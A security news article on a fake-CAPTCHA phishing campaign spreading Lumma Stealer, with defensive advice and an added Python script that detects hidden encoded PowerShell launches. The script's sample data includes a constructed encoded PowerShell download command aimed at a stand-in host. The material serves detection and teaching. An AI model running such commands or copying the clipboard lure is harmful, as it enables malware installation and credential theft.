
Phishing campaign mimics CAPTCHA to spread malware

CloudSEK reveals an advanced method for spreading the Lumma Stealer malware. This is a serious threat to Windows users.

According to TechRadar, this technique uses misleading verification pages to trick users into unknowingly executing malicious commands. Although the campaign primarily targets the spread of Lumma Stealer malware, this method could be adapted to spread a wide range of other malicious software.

The campaign uses trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs) to host phishing websites. The malware delivered from them is modular: the initial executable downloads additional components or modules, which complicates detection and analysis.

CAPTCHA verification page

The infection begins when victims are lured to phishing websites that mimic legitimate Google CAPTCHA verification pages. Criminals present these pages as a necessary verification step, leading users to believe they are completing a standard security check.

Once the user clicks the Verify button, the attack becomes even more sophisticated. Behind the scenes, a hidden JavaScript function copies a base64-encoded PowerShell command onto the user’s clipboard without the user noticing.

The phishing page then instructs the user to perform unusual steps: open the Run dialog box (Win+R) and paste in the command that is already on the clipboard.

If the user follows these instructions, the PowerShell command is executed in a hidden window, making it virtually impossible for the victim to notice.

The hidden PowerShell command connects to a remote server to download additional content, such as a text file (a.txt) with instructions to obtain and execute the Lumma Stealer malware. Once the malware is installed on the system, it connects to domains controlled by the attackers. This allows the attackers to compromise the system, steal sensitive data and potentially perform malicious activities.

Proactive defense

Users and organizations must prioritize security awareness and implement proactive defences to counter this phishing campaign.

The deceptive nature of these attacks – disguised as legitimate authentication processes – emphasizes the need to educate users about the dangers of following suspicious prompts, especially when asked to copy and paste unknown commands.

Users must be trained to recognize phishing tactics, to question unexpected CAPTCHA verifications, and to be wary of unfamiliar instructions that involve executing system commands.

Robust endpoint protection

Implementing advanced security tools is essential to prevent PowerShell-based attacks. Since the attackers in this campaign rely heavily on PowerShell, organizations must ensure that their security solutions can detect and block activities related to PowerShell.

Tools with behavioural analysis and real-time monitoring can detect unusual command executions and prevent malware from being downloaded and installed.
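As an added example (not from the article or from CloudSEK), the following Python triage script applies the behavioural checks described above to constructed process-creation events: it flags PowerShell launched from explorer.exe (the parent of anything started via Win+R) with a hidden window and an encoded command, and decodes that command (base64 of UTF-16LE text) so an analyst can see the download URL. The field names, sample events and the example.invalid host are all constructed placeholders.

```python
import base64
import re
from typing import Optional

# Heuristic triage, not a product signature: flag process-creation events that
# match the pattern described above (PowerShell started from the Run dialog,
# hidden window, base64-encoded command) and decode the payload for analysts.
HIDDEN_FLAG = re.compile(r"^-w(indowstyle)?$", re.I)
ENCODED_FLAG = re.compile(r"^-e(nc|c|ncodedcommand)?$", re.I)

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")

def triage_event(event: dict) -> Optional[dict]:
    """Return a finding for a suspicious PowerShell launch, else None."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    args = event["command_line"].split()
    hidden, encoded = False, None
    for i, tok in enumerate(args[:-1]):
        if HIDDEN_FLAG.match(tok) and args[i + 1].lower() == "hidden":
            hidden = True
        elif ENCODED_FLAG.match(tok):
            encoded = args[i + 1]
    if not (hidden and encoded):
        return None
    reasons = ["hidden window", "encoded command"]
    # Win+R launches its child from explorer.exe; that parent plus a hidden
    # encoded command is the strongest single indicator of this lure.
    if event["parent_image"].lower().endswith("explorer.exe"):
        reasons.append("launched from explorer.exe (Run dialog)")
    decoded = decode_encoded_command(encoded)
    urls = re.findall(r"https?://[^\s'\"]+", decoded, re.I)
    return {"pid": event["pid"], "reasons": reasons, "decoded": decoded, "urls": urls}

def run_triage(events) -> list:
    return [f for f in map(triage_event, events) if f]

def _encode(cmd: str) -> str:  # helper used only to build the constructed sample
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, loosely modelled on Sysmon Event ID 1 fields
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc "
                     + _encode("Invoke-WebRequest http://stager.example.invalid/a.txt")},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\ops\backup.ps1"},
    {"pid": 4200, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in run_triage(SAMPLE_EVENTS):
        print(finding["pid"], ", ".join(finding["reasons"]), finding["urls"])
```

Only the first event is flagged; the scheduled script under svchost.exe and the notepad launch from explorer.exe pass, which is the point of combining parent, window style and encoding rather than alerting on PowerShell alone.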

Organizations should monitor network traffic for suspicious activity. Security teams should pay extra attention to connections to newly registered or unusual domains, which attackers often use to spread malware or steal sensitive data.

Updating systems with the latest patches is a crucial defence measure. Regular updates fix known vulnerabilities, reducing the opportunities for attackers to exploit outdated software to spread malware such as Lumma Stealer.